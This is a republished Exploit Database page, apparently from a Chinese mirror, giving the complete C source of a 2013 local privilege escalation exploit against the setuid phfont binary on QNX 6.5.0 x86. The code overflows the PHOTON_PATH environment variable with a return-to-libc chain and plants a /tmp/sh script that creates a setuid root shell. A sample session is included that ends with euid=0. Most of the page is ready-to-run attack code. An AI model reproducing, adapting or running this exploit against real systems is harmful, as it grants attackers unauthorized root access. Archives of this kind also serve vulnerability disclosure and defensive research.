QNX 6.5.0 x86 phfont – Local Privilege Escalation

• Exploit Database
• 112 阅读

• 作者： cenobyte
  日期： 2014-03-10
• 类别：

  • local
  平台：

  • qnx
• 来源：https://www.exploit-db.com/exploits/32155/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194

  /* *QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013 *<vincitamorpatriae@gmail.com> * * - vulnerability description: * Setuid root /usr/photon/bin/phfont on QNX is prone to a buffer overflow. * The vulnerability is due to insufficent bounds checking of the PHOTON_HOME * environment variable. * * - vulnerable platforms: * QNX 6.5.0SP1 * QNX 6.5.0 * QNX 6.4.1 * * - not vulnerable: * QNX 6.3.0 * QNX 6.2.0 * * - exploit information: * This is a return-to-libc exploit that yields euid=0. The addresses of * system() and exit() are retrieved from libc using dlsym(). * * During development of this exploit I ran into tty issues after succesfully * overwriting the EIP and launching /bin/sh. The following message appeared: * * No controlling tty (open /dev/tty: No such device or address) * * The shell became unusable and required a kill -9 to exit. To get around that * I had modify the exploit to create a shell script named /tmp/sh which copies * /bin/sh to /tmp/shell and then performs a chmod +s on /tmp/shell. * * During execution of the exploit the argument of system() will be set to sh, * and PATH will be set to /tmp. Once /tmp/sh is been executed, the exploit * will launch the setuid /tmp/shell yielding the user euid=0. * * - example: * $ uname -a * QNX localhost 6.5.0 2010/07/09-14:44:03EDT x86pc x86 * $ id * uid=100(user) gid=100 * $ ./qnx-phfont * QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013 * * [-] system(): 0xb031bd80 * [-] exit(): 0xb032b5f0 * [-] sh: 0xb030b7f8 * [-] now dropping into root shell... * # id * uid=100(user) gid=100 euid=0(root) * */   #include <sys/types.h> #include <sys/stat.h>   #include <dlfcn.h> #include <err.h> #include <fcntl.h> #include <signal.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h>   #define HEADER "QNX 6.5.0 x86 phfont local root exploit by cenobyte 2013" #define VULN "PHOTON_PATH=" #define OFFSET 416 #define FILENAME "/tmp/sh"   static void createshell(void); static void fail(void); static void checknull(unsigned int addr); static unsigned int find_string(char *s); static unsigned int is_string(unsigned int addr, char *string); static unsigned int find_libc(char *syscall);   void createshell(void) { int fd; char *s="/bin/cp /bin/sh /tmp/shell\n" "/bin/chmod 4755 /tmp/shell\n" "/bin/chown root:root /tmp/shell\n";   fd = open(FILENAME, O_RDWR|O_CREAT, S_IRWXU|S_IXGRP|S_IXOTH); if (fd < 0) errx(1, "cannot open %s for writing", FILENAME);   write(fd, s, strlen(s)); close(fd); }   void checknull(unsigned int addr) { if (!(addr & 0xff) || \ !(addr & 0xff00) || \ !(addr & 0xff0000) || \ !(addr & 0xff000000)) errx(1, "return-to-libc failed: " \ "0x%x contains a null byte", addr); }   void fail(void) { printf("\n"); errx(1, "return-to-libc failed"); }   unsigned int is_string(unsigned int addr, char *string) { char *a = addr;   signal(SIGSEGV, fail);   if (strcmp(a, string) == 0) return(0);   return(1); }   unsigned int find_string(char *string) { unsigned int i; printf("[-] %s: ", string);   for (i = 0xb0300000; i < 0xdeadbeef; i++) { if (is_string(i, string) != 0) continue;   printf("0x%x\n", i); checknull(i); return(i); }   return(1); }   unsigned int find_libc(char *syscall) { void *s; unsigned int syscall_addr;   if (!(s = dlopen(NULL, RTLD_LAZY))) errx(1, "error: dlopen() failed");   if (!(syscall_addr = (unsigned int)dlsym(s, syscall))) errx(1, "error: dlsym() %s", syscall);   printf("[-] %s(): 0x%x\n", syscall, syscall_addr); checknull(syscall_addr); return(syscall_addr);   return(1); }   int main(int argc, char **argv) { unsigned int system_addr; unsigned int exit_addr; unsigned int sh_addr;   char env[440];   printf("%s\n\n", HEADER);   createshell();   system_addr = find_libc("system"); exit_addr = find_libc("exit"); sh_addr = find_string("sh");   memset(env, 0xEB, sizeof(env)); memcpy(env + OFFSET, (char *)&system_addr, 4); memcpy(env + OFFSET + 4, (char *)&exit_addr, 4); memcpy(env + OFFSET + 8, (char *)&sh_addr, 4);   setenv("PHOTON_PATH", env, 0); system("PATH=/tmp:/bin:/sbin:/usr/bin:/usr/sbin /usr/photon/bin/phfont");   printf("[-] now dropping into root shell...\n");   sleep(2); if (unlink(FILENAME) != 0) printf("error: cannot unlink %s\n", FILENAME);   system("/tmp/shell");   return(0); }